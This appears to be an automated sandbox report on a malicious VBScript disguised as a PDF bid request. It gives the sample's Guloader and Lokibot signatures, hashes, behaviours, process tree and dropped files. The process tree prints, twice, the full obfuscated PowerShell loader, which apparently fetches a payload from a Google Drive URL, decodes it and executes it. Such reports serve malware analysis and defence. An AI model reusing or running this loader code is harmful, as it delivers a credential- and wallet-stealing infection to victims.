Analysis

  • max time kernel
    146s
  • max time network
    143s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    09-09-2024 11:26

General

  • Target

    BID REQUEST 09-09-2024·pdf.vbs

  • Size

    28KB

  • MD5

    91f307a573cd6e7ee7e8c741cde8a157

  • SHA1

    d3b75565ad3e04be34cc66b6571614d440429cde

  • SHA256

    dcc61fc2e0953c7200312ebee92f58407686435980d53001cd2b86ee2e7eda25

  • SHA512

    6353409bc55e4ab387395acd0909be30c8b3dd271a8f4b52bcebc7e60562b46f5d076dcac2b42aca9c77c212ea384cf1d015ce8f104cb77f5128314a52bf6607

  • SSDEEP

    192:3fC9kiwVtrdKy5L4vGK7cxIZfTEtlUJKQbo7jdfBr2wojG87ves+d7vS9TMW:3fGordf0oX9QakfG8rPumMW

Malware Config

Signatures

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

  • Lokibot

    Lokibot is a Password and CryptoCoin Wallet Stealer.

  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

  • Blocklisted process makes network request 3 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\BID REQUEST 09-09-2024·pdf.vbs"
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3044
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Unattributable='Forligsmands';$Fleyedly=${host}.Runspace;If ($Fleyedly) {$preaffection++;$Unattributable+='Vvstypernes';$Binokular='su';$Unattributable+='Craniectomy';$Binokular+='bs';$Unattributable+='Sabotepr';$Binokular+='tri';$Unattributable+='Chamiso';$Binokular+='ng';};Function Baaser($frdiggjorde){$Alkoholtestens=$frdiggjorde.Length-$preaffection;For( $Fabricate=5;$Fabricate -lt $Alkoholtestens;$Fabricate+=6){$Udsaltningernes+=$frdiggjorde.$Binokular.'Invoke'( $Fabricate, $preaffection);}$Udsaltningernes;}function Vancourier($Rutefarts){ & ($Jentjeneri) ($Rutefarts);}$Sulphonethylmethane=Baaser 'Fa,orMFimbroshopgzP,rtiiBayonlGullilAnoraaSoros/,fbry5Stikn.Saelg0 Me,n Tisse( MuggWPropli.ingen.gustdSko.foTh,tcwsamm sU,urp V,lgmNUns,iT S st Myto1Krymp0Sttte.Cynam0Brand; .rex SloveWKassaiIn,ernDa,be6Anden4skran; capr JunkexSnu,r6Estra4.ogno; Fo m EpityrNonbuvTassa:M,dic1 Bobb2Ribon1Eutec.Kasse0Aftal)Efter NrigeG Be reRetroc EnkekkrimioSesam/Impo,2Pro,e0D,cre1 Hval0pause0Denat1Losel0Taxab1Gall JawroF iminiM.hogrGaltee ontrf.ibblonjalsxU,dis/Betel1Ti.ra2,ugme1Smaas.Illim0 Flux ';$Sgeordets=Baaser 'KunstUEtikesRequieOrdenrGenn -Maz.pAIndf,gSurrieUltranundlatExhor ';$Finalises=Baaser 'CommihBygn,tUrbe,tPistopDi tasRagna:Gesta/Cocom/IsonydSa,yrrLamoni.eorevTagryeNonco.LuftkgMarploclanko InsogOutwalEncomeA.ear.Cardic S deo Ad,emNedka/ Salpu K,llcFu ym? FrgneSskenxcor.yp Svbeo JustrCalent,agce=w.beldAcclioCustawV,tern AssulLe,tooSygesaStyltdKicks&Valutia comd Je,n= Sa p1IleaczCinem3Mixtuv,kortcBac,b_AfrigU SkjtyT,tivyAdjudmUnderaEjakujS itsZFejlkdS,ckdjBoref8Kystvx DeliQDrejnUr stehTakkeKP issbRegiop bredgBruteTDimlyhgin.gQUnre bMagneuStempqFrottDJacquj SandfUmor, ';$Svejtserens=Baaser 'Vlted>Tr ck ';$Jentjeneri=Baaser ' .ruciGasfle gn,gxRemse ';$Fabricatenclude62='Grundfladeradierne';$Paon = Baaser 'AbucheFrikacSoftwhTendeo.maab Fleks%FalinaVerdepHundspDenotd InvaaAarsat Outsa Disc%He,se\Regn AHa lasVa.astFr.merProm a ,aunlh ckleattic.Vishnt Hol,aE.ektxAarrg Resor&Sojak&Bi.la SakseSlemmcBandehSal,ioSkibs Wardet Lith ';Vancourier (Baaser 'Eelsk$Talbeg.agenlPhilooObsolb Konca Paral,yart:AnsvaA UngrnSordiiInstrmNe.loaTamarnBrigatNucle=Kraft(MacrocOra,hmProtad Lavi denat/AromacSteal .acka$Os,icP.uffiaStewiovisaunMobbi) Data ');Vancourier (Baaser 'Alvor$FibergGliril Und oDaek.bPolaraDiscolDomin: ReduF,npleu FadasHalvf= ,agl$styraF ybfiC.ddinManusakapitlDollaiover s AnoreovertsAttai.KhanesEpaxipSquiblBrndeiInexet luf.(Val,t$FrillSBot nv StaaePrimmjMedvitExamisAnthre Tri rMathieN,nfenGarvnsSjael)Konya ');Vancourier (Baaser 'Phleg[WieneN aceteD bbetStone.UncoiS SemieCysterUndervMeadoiK,nkuc Cou eApicePUndero .zoxiGlacin ummt KompMjubila,rombn FrikaEksilg .eksetobakrLabr.]sgeti: etac:St.anSLiceneVulnec Galvu FlusrAndeniR,alatBis,ayJonisPKaroorPatr oOkroot Valeo TropcGudeno rilllUndiv gldss=Atrr, Tanke[Bg neNRhi,oeNedtrtStuer.P lloSfravleunp.ecHepatuRop rrSlangiModtatIsengyAr isP ForsrErosioAbeart Divio CobwcReviso Ten.lis.liTDisagy Nac p SvareRekrn]Under: udbe:Ha,rdTP,rislUn.hos.onor1El,kt2Banke ');$Finalises=$Fus[0];$Landbrugeren= (Baaser 'Borts$ BiligWi,dil B,ndoLargeb arfaaInve.lAnga :UnpersGraphkTopvirSubsiaNi,hnb lokte AlcmrAvitanHaandeUdlgg= SnouNHomateI terwAgo.i-t.nkrOVoldsbmoyenjKinaee Gevkc.xplat bagg BeboeSdealayConfas .ontt G,dseAut,smDysbu.Te maN Gee,e GenntSy.te.ParasWLdreieCoq,ibSyll C TjenlKppesiHomieeekspenPey,rt');$Landbrugeren+=$Animant[1];Vancourier ($Landbrugeren);Vancourier (Baaser 'Coa.d$l.gansLocalkAar,nrBivogaF.agebBisp.eCok,rrAandlnApotee G,os.AztekHCharlebeepiaNonsidDec.meUn arrGu vms ,ljt[Lynaf$XerogS emigpalomemobi oHomo rforbadBlockeCubbitTompksFe.ls]Svrvg= Fore$ha rwS AbonuEmnealconsipbe zih GeomoUnmoln Fyrsemerlet HusbhPyrimyP.ofilUdeblmTiss ePrototTrevrhDy.gva.alennund.reNonre ');$Saleswoman=Baaser 'Deplu$Lepros JonikGuin.rOpencaSy,epb Fr,fe KronrFilstnBitineHoved.HovmoDSag.roU,claw mbaln eklal r.mioSkndea.rykfd ForeFUn agi Sp tl,krmte.agsa( Virk$ rudeFParteiBsfsenInf aaFontaljohn,iFysios PremeSkin sMater,meli,$Splo.RNongreFangswSympae Bor lpr,mocSpeilo KompmHelioe Leve)Forsk ';$Rewelcome=$Animant[0];Vancourier (Baaser 'Yepel$goldegIm,reldokumo ,larb StanaAnderl Hlen: T.leNUndgluMomspaLidasnSp ngcAfmate Remor InopeSpr gdKultieNeddy=Em.ls(MetodT ImmoeMonopsUlandtauto,-udvisPKera,a R intSoda hIsole Fi.ma$AraliRKugleeTelefwRserneRatihlMe.sicPhot o opsvmOutsteVaref)Tran, ');while (!$Nuancerede) {Vancourier (Baaser ' Sjus$Apo ag rbllY.sdro Reelbskr vaTragolIncom:FloodS orsym,ffiraBelbsl sennfP.akli Metal CurtmSlopseMalaprTrst.nNed.ue f,se=Maen.$ CountNe.enrcircuuDikt e howm ') ;Vancourier $Saleswoman;Vancourier (Baaser 'CarboSAgrectEkspaaArbejr oneltKolla-Uop.tS ksplCheckeSup,reHugtnpUlu.i Inder4Brahm ');Vancourier (Baaser 'Demon$macumgUnreslU delo RegebBoardaE etrlPree :D ffeN assuDeglaaShoern kuldcsectaeHel irAndaseKoll dKlageeKraki=Moseo(F.gedTrazedeObversUnguttImdeg-FidusPTe peaMindetSkrumhBrneb Klaps$Isd kRBreeceP eilwunteleModsvl SkaacDbenaoCubanmBarthehande)Rhabd ') ;Vancourier (Baaser 'Jamme$ AtongDisa.lAccuso AltebKardeaUrundlCons,:FleksBFrgemeProthnOldebeBronzdsavspdOm,uderes.prKvalm=Under$HenvigVisitlf,yseoIndhob Krysa EpimlRetsv:GatttF KartaTrichtSpi.stSkoliiVa,henPusalgaddit+stedf+O.gld% Gans$ RealFSeminu s.irsDrist. eassc Tango Fr,guUdrydnG rlat tjae ') ;$Finalises=$Fus[$Benedder];}$Citrusfrugterne=332548;$Tallinie=29239;Vancourier (Baaser ' Indv$Fle.vgSkinplSpionoI.terbJoseia EpinlQueds:Gruf GZonkii.oncug .yewgSynchlLsagte Monr Gui e=blaak submiGSa omeMarcetGast.- I.trCUn itoNa,urnPe,ustH,fteeSkid,nBol vtUds,g Sag,n$BesvaRPe.vee nkyw bak.e ,ortlHjemmcConfioSadomm ar.ueKvles ');Vancourier (Baaser 'Pussi$WidengStatsl HomooLovefbDecolaGenopl Secc:SpontNSk ftaChemos DextaRekrelFakulibygdesSk keeStkni St,ta=Logar Bort[Ba tuS Metay ForbsExcultJuxtaeO,leam forl. eifbCDesmooMitten ForevMidcoe GraarCh omtValgk]Autok: Hass: KyllF Ves.rMoonpoTalchmSabbaBKvindaphoensKonfeeI,ter6Urvrk4.straSKosmetstrafrB dgeiPromenAlkalgMolet(Var e$ ,nteGJer,bi IllagMellagBetinl Me ae,rotu)Sladd ');Vancourier (Baaser 'Antip$Forhig AxislBr,akoDetrobSyst.aBe,tal Ri,k:SnedkK MadioOverbnAfrakfPrefei.attes BradkArb,jeEng nrNoncoilinotnRefragWra,se Beg nConsts,ossi Kosta=U sad Ret.r[CoffsSAdfrdy Int,s WinttOptr eCa,gam Tviv. SystT leareCampexGelantBlgra.AntegEBrnepnUdenecFo keo,inkadfal gioxbernKal,ngLegum]Screw: Fors:HasheA S.mmSBenefC SlagIMelerIPoeti.Firm,Gc.ntueOver.tMelleSRig,ot.anatr.lektiF ippnParkegu sti(Phosp$K.yttNDefloaMon ms verdaFlerblAd.nvi .egesUn.ereEmpyr)ekstr ');Vancourier (Baaser ' Smut$ Spi.gUndi.lSynovoElkhobEm,ira PyrelForwa:KritifRappeeNonsuddiglyeTransrJong.aRuskntRaketi Tingo Srhen,laabePosterOutdr=Subop$ValgbKHerudo Loftn OphifMedfri Fng s ulfkCounte aconrContri SkronDrblegHydroehorrenJordlsLysre.HontosHeroluBemanbHyp.asImpretUni.prRetteiTranqn iliegberli(Oppro$ArridCMalikiRedatt ForsrG.nysu KalksUnforf ilflrOpkr.uAfte.g .psat P,laeL ctur CurrnEighte.olyg,Decoy$For jTFil,raFur,llA umilSinisiApodynModhaiSoc,aeI.age)Tapst ');Vancourier $federationer;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2012
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Astrale.tax && echo t"
        3⤵
          PID:5064
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Unattributable='Forligsmands';$Fleyedly=${host}.Runspace;If ($Fleyedly) {$preaffection++;$Unattributable+='Vvstypernes';$Binokular='su';$Unattributable+='Craniectomy';$Binokular+='bs';$Unattributable+='Sabotepr';$Binokular+='tri';$Unattributable+='Chamiso';$Binokular+='ng';};Function Baaser($frdiggjorde){$Alkoholtestens=$frdiggjorde.Length-$preaffection;For( $Fabricate=5;$Fabricate -lt $Alkoholtestens;$Fabricate+=6){$Udsaltningernes+=$frdiggjorde.$Binokular.'Invoke'( $Fabricate, $preaffection);}$Udsaltningernes;}function Vancourier($Rutefarts){ & ($Jentjeneri) ($Rutefarts);}$Sulphonethylmethane=Baaser 'Fa,orMFimbroshopgzP,rtiiBayonlGullilAnoraaSoros/,fbry5Stikn.Saelg0 Me,n Tisse( MuggWPropli.ingen.gustdSko.foTh,tcwsamm sU,urp V,lgmNUns,iT S st Myto1Krymp0Sttte.Cynam0Brand; .rex SloveWKassaiIn,ernDa,be6Anden4skran; capr JunkexSnu,r6Estra4.ogno; Fo m EpityrNonbuvTassa:M,dic1 Bobb2Ribon1Eutec.Kasse0Aftal)Efter NrigeG Be reRetroc EnkekkrimioSesam/Impo,2Pro,e0D,cre1 Hval0pause0Denat1Losel0Taxab1Gall JawroF iminiM.hogrGaltee ontrf.ibblonjalsxU,dis/Betel1Ti.ra2,ugme1Smaas.Illim0 Flux ';$Sgeordets=Baaser 'KunstUEtikesRequieOrdenrGenn -Maz.pAIndf,gSurrieUltranundlatExhor ';$Finalises=Baaser 'CommihBygn,tUrbe,tPistopDi tasRagna:Gesta/Cocom/IsonydSa,yrrLamoni.eorevTagryeNonco.LuftkgMarploclanko InsogOutwalEncomeA.ear.Cardic S deo Ad,emNedka/ Salpu K,llcFu ym? FrgneSskenxcor.yp Svbeo JustrCalent,agce=w.beldAcclioCustawV,tern AssulLe,tooSygesaStyltdKicks&Valutia comd Je,n= Sa p1IleaczCinem3Mixtuv,kortcBac,b_AfrigU SkjtyT,tivyAdjudmUnderaEjakujS itsZFejlkdS,ckdjBoref8Kystvx DeliQDrejnUr stehTakkeKP issbRegiop bredgBruteTDimlyhgin.gQUnre bMagneuStempqFrottDJacquj SandfUmor, ';$Svejtserens=Baaser 'Vlted>Tr ck ';$Jentjeneri=Baaser ' .ruciGasfle gn,gxRemse ';$Fabricatenclude62='Grundfladeradierne';$Paon = Baaser 'AbucheFrikacSoftwhTendeo.maab Fleks%FalinaVerdepHundspDenotd InvaaAarsat Outsa Disc%He,se\Regn AHa lasVa.astFr.merProm a ,aunlh ckleattic.Vishnt Hol,aE.ektxAarrg Resor&Sojak&Bi.la SakseSlemmcBandehSal,ioSkibs Wardet Lith ';Vancourier (Baaser 'Eelsk$Talbeg.agenlPhilooObsolb Konca Paral,yart:AnsvaA UngrnSordiiInstrmNe.loaTamarnBrigatNucle=Kraft(MacrocOra,hmProtad Lavi denat/AromacSteal .acka$Os,icP.uffiaStewiovisaunMobbi) Data ');Vancourier (Baaser 'Alvor$FibergGliril Und oDaek.bPolaraDiscolDomin: ReduF,npleu FadasHalvf= ,agl$styraF ybfiC.ddinManusakapitlDollaiover s AnoreovertsAttai.KhanesEpaxipSquiblBrndeiInexet luf.(Val,t$FrillSBot nv StaaePrimmjMedvitExamisAnthre Tri rMathieN,nfenGarvnsSjael)Konya ');Vancourier (Baaser 'Phleg[WieneN aceteD bbetStone.UncoiS SemieCysterUndervMeadoiK,nkuc Cou eApicePUndero .zoxiGlacin ummt KompMjubila,rombn FrikaEksilg .eksetobakrLabr.]sgeti: etac:St.anSLiceneVulnec Galvu FlusrAndeniR,alatBis,ayJonisPKaroorPatr oOkroot Valeo TropcGudeno rilllUndiv gldss=Atrr, Tanke[Bg neNRhi,oeNedtrtStuer.P lloSfravleunp.ecHepatuRop rrSlangiModtatIsengyAr isP ForsrErosioAbeart Divio CobwcReviso Ten.lis.liTDisagy Nac p SvareRekrn]Under: udbe:Ha,rdTP,rislUn.hos.onor1El,kt2Banke ');$Finalises=$Fus[0];$Landbrugeren= (Baaser 'Borts$ BiligWi,dil B,ndoLargeb arfaaInve.lAnga :UnpersGraphkTopvirSubsiaNi,hnb lokte AlcmrAvitanHaandeUdlgg= SnouNHomateI terwAgo.i-t.nkrOVoldsbmoyenjKinaee Gevkc.xplat bagg BeboeSdealayConfas .ontt G,dseAut,smDysbu.Te maN Gee,e GenntSy.te.ParasWLdreieCoq,ibSyll C TjenlKppesiHomieeekspenPey,rt');$Landbrugeren+=$Animant[1];Vancourier ($Landbrugeren);Vancourier (Baaser 'Coa.d$l.gansLocalkAar,nrBivogaF.agebBisp.eCok,rrAandlnApotee G,os.AztekHCharlebeepiaNonsidDec.meUn arrGu vms ,ljt[Lynaf$XerogS emigpalomemobi oHomo rforbadBlockeCubbitTompksFe.ls]Svrvg= Fore$ha rwS AbonuEmnealconsipbe zih GeomoUnmoln Fyrsemerlet HusbhPyrimyP.ofilUdeblmTiss ePrototTrevrhDy.gva.alennund.reNonre ');$Saleswoman=Baaser 'Deplu$Lepros JonikGuin.rOpencaSy,epb Fr,fe KronrFilstnBitineHoved.HovmoDSag.roU,claw mbaln eklal r.mioSkndea.rykfd ForeFUn agi Sp tl,krmte.agsa( Virk$ rudeFParteiBsfsenInf aaFontaljohn,iFysios PremeSkin sMater,meli,$Splo.RNongreFangswSympae Bor lpr,mocSpeilo KompmHelioe Leve)Forsk ';$Rewelcome=$Animant[0];Vancourier (Baaser 'Yepel$goldegIm,reldokumo ,larb StanaAnderl Hlen: T.leNUndgluMomspaLidasnSp ngcAfmate Remor InopeSpr gdKultieNeddy=Em.ls(MetodT ImmoeMonopsUlandtauto,-udvisPKera,a R intSoda hIsole Fi.ma$AraliRKugleeTelefwRserneRatihlMe.sicPhot o opsvmOutsteVaref)Tran, ');while (!$Nuancerede) {Vancourier (Baaser ' Sjus$Apo ag rbllY.sdro Reelbskr vaTragolIncom:FloodS orsym,ffiraBelbsl sennfP.akli Metal CurtmSlopseMalaprTrst.nNed.ue f,se=Maen.$ CountNe.enrcircuuDikt e howm ') ;Vancourier $Saleswoman;Vancourier (Baaser 'CarboSAgrectEkspaaArbejr oneltKolla-Uop.tS ksplCheckeSup,reHugtnpUlu.i Inder4Brahm ');Vancourier (Baaser 'Demon$macumgUnreslU delo RegebBoardaE etrlPree :D ffeN assuDeglaaShoern kuldcsectaeHel irAndaseKoll dKlageeKraki=Moseo(F.gedTrazedeObversUnguttImdeg-FidusPTe peaMindetSkrumhBrneb Klaps$Isd kRBreeceP eilwunteleModsvl SkaacDbenaoCubanmBarthehande)Rhabd ') ;Vancourier (Baaser 'Jamme$ AtongDisa.lAccuso AltebKardeaUrundlCons,:FleksBFrgemeProthnOldebeBronzdsavspdOm,uderes.prKvalm=Under$HenvigVisitlf,yseoIndhob Krysa EpimlRetsv:GatttF KartaTrichtSpi.stSkoliiVa,henPusalgaddit+stedf+O.gld% Gans$ RealFSeminu s.irsDrist. eassc Tango Fr,guUdrydnG rlat tjae ') ;$Finalises=$Fus[$Benedder];}$Citrusfrugterne=332548;$Tallinie=29239;Vancourier (Baaser ' Indv$Fle.vgSkinplSpionoI.terbJoseia EpinlQueds:Gruf GZonkii.oncug .yewgSynchlLsagte Monr Gui e=blaak submiGSa omeMarcetGast.- I.trCUn itoNa,urnPe,ustH,fteeSkid,nBol vtUds,g Sag,n$BesvaRPe.vee nkyw bak.e ,ortlHjemmcConfioSadomm ar.ueKvles ');Vancourier (Baaser 'Pussi$WidengStatsl HomooLovefbDecolaGenopl Secc:SpontNSk ftaChemos DextaRekrelFakulibygdesSk keeStkni St,ta=Logar Bort[Ba tuS Metay ForbsExcultJuxtaeO,leam forl. eifbCDesmooMitten ForevMidcoe GraarCh omtValgk]Autok: Hass: KyllF Ves.rMoonpoTalchmSabbaBKvindaphoensKonfeeI,ter6Urvrk4.straSKosmetstrafrB dgeiPromenAlkalgMolet(Var e$ ,nteGJer,bi IllagMellagBetinl Me ae,rotu)Sladd ');Vancourier (Baaser 'Antip$Forhig AxislBr,akoDetrobSyst.aBe,tal Ri,k:SnedkK MadioOverbnAfrakfPrefei.attes BradkArb,jeEng nrNoncoilinotnRefragWra,se Beg nConsts,ossi Kosta=U sad Ret.r[CoffsSAdfrdy Int,s WinttOptr eCa,gam Tviv. SystT leareCampexGelantBlgra.AntegEBrnepnUdenecFo keo,inkadfal gioxbernKal,ngLegum]Screw: Fors:HasheA S.mmSBenefC SlagIMelerIPoeti.Firm,Gc.ntueOver.tMelleSRig,ot.anatr.lektiF ippnParkegu sti(Phosp$K.yttNDefloaMon ms verdaFlerblAd.nvi .egesUn.ereEmpyr)ekstr ');Vancourier (Baaser ' Smut$ Spi.gUndi.lSynovoElkhobEm,ira PyrelForwa:KritifRappeeNonsuddiglyeTransrJong.aRuskntRaketi Tingo Srhen,laabePosterOutdr=Subop$ValgbKHerudo Loftn OphifMedfri Fng s ulfkCounte aconrContri SkronDrblegHydroehorrenJordlsLysre.HontosHeroluBemanbHyp.asImpretUni.prRetteiTranqn iliegberli(Oppro$ArridCMalikiRedatt ForsrG.nysu KalksUnforf ilflrOpkr.uAfte.g .psat P,laeL ctur CurrnEighte.olyg,Decoy$For jTFil,raFur,llA umilSinisiApodynModhaiSoc,aeI.age)Tapst ');Vancourier $federationer;"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4436
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Astrale.tax && echo t"
            4⤵
            • System Location Discovery: System Language Discovery
            PID:4824
          • C:\Program Files (x86)\windows mail\wab.exe
            "C:\Program Files (x86)\windows mail\wab.exe"
            4⤵
              PID:3040
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe"
              4⤵
              • Accesses Microsoft Outlook profiles
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious use of AdjustPrivilegeToken
              • outlook_office_path
              • outlook_win_path
              PID:4144

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_j5pst0le.zis.ps1

        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • C:\Users\Admin\AppData\Roaming\Astrale.tax

        Filesize

        471KB

        MD5

        f43a1c7b2d3051470f15f4a8fb40b608

        SHA1

        79e8e531eee6de4442ea9530b2d6ec8dd42976c0

        SHA256

        42963ca28366ff4e2e92ae25a202936b3f47c51841b7da008e351f2eb8085551

        SHA512

        74f61e2fd5f698a8a690894600abce4a20504c60f048ee70c99a4e35e9083aee129cd9f2ad6f5609ccc13cdda0551fea1bf0048cae327686955f22626a62c159

      • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1194130065-3471212556-1656947724-1000\0f5007522459c86e95ffcc62f32308f1_a53bb4ca-6113-48bb-9609-441860fdd0d7

        Filesize

        46B

        MD5

        d898504a722bff1524134c6ab6a5eaa5

        SHA1

        e0fdc90c2ca2a0219c99d2758e68c18875a3e11e

        SHA256

        878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9

        SHA512

        26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61

      • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1194130065-3471212556-1656947724-1000\0f5007522459c86e95ffcc62f32308f1_a53bb4ca-6113-48bb-9609-441860fdd0d7

        Filesize

        46B

        MD5

        c07225d4e7d01d31042965f048728a0a

        SHA1

        69d70b340fd9f44c89adb9a2278df84faa9906b7

        SHA256

        8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a

        SHA512

        23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b

      • memory/2012-15-0x00007FF9E5600000-0x00007FF9E60C1000-memory.dmp

        Filesize

        10.8MB

      • memory/2012-18-0x00007FF9E5603000-0x00007FF9E5605000-memory.dmp

        Filesize

        8KB

      • memory/2012-16-0x00007FF9E5600000-0x00007FF9E60C1000-memory.dmp

        Filesize

        10.8MB

      • memory/2012-37-0x00007FF9E5600000-0x00007FF9E60C1000-memory.dmp

        Filesize

        10.8MB

      • memory/2012-62-0x00007FF9E5600000-0x00007FF9E60C1000-memory.dmp

        Filesize

        10.8MB

      • memory/2012-5-0x000001E5720A0000-0x000001E5720C2000-memory.dmp

        Filesize

        136KB

      • memory/2012-40-0x00007FF9E5600000-0x00007FF9E60C1000-memory.dmp

        Filesize

        10.8MB

      • memory/2012-4-0x00007FF9E5603000-0x00007FF9E5605000-memory.dmp

        Filesize

        8KB

      • memory/4144-59-0x0000000000D80000-0x0000000004E96000-memory.dmp

        Filesize

        65.1MB

      • memory/4436-35-0x0000000005ED0000-0x0000000005EEE000-memory.dmp

        Filesize

        120KB

      • memory/4436-43-0x0000000007EF0000-0x0000000008494000-memory.dmp

        Filesize

        5.6MB

      • memory/4436-38-0x0000000007870000-0x0000000007EEA000-memory.dmp

        Filesize

        6.5MB

      • memory/4436-39-0x0000000007000000-0x000000000701A000-memory.dmp

        Filesize

        104KB

      • memory/4436-34-0x00000000058E0000-0x0000000005C34000-memory.dmp

        Filesize

        3.3MB

      • memory/4436-41-0x00000000071F0000-0x0000000007286000-memory.dmp

        Filesize

        600KB

      • memory/4436-42-0x00000000070F0000-0x0000000007112000-memory.dmp

        Filesize

        136KB

      • memory/4436-36-0x0000000005F10000-0x0000000005F5C000-memory.dmp

        Filesize

        304KB

      • memory/4436-24-0x00000000057B0000-0x0000000005816000-memory.dmp

        Filesize

        408KB

      • memory/4436-45-0x00000000084A0000-0x000000000C5B6000-memory.dmp

        Filesize

        65.1MB

      • memory/4436-23-0x00000000056D0000-0x0000000005736000-memory.dmp

        Filesize

        408KB

      • memory/4436-22-0x0000000004F00000-0x0000000004F22000-memory.dmp

        Filesize

        136KB

      • memory/4436-21-0x0000000004FA0000-0x00000000055C8000-memory.dmp

        Filesize

        6.2MB

      • memory/4436-20-0x0000000004930000-0x0000000004966000-memory.dmp

        Filesize

        216KB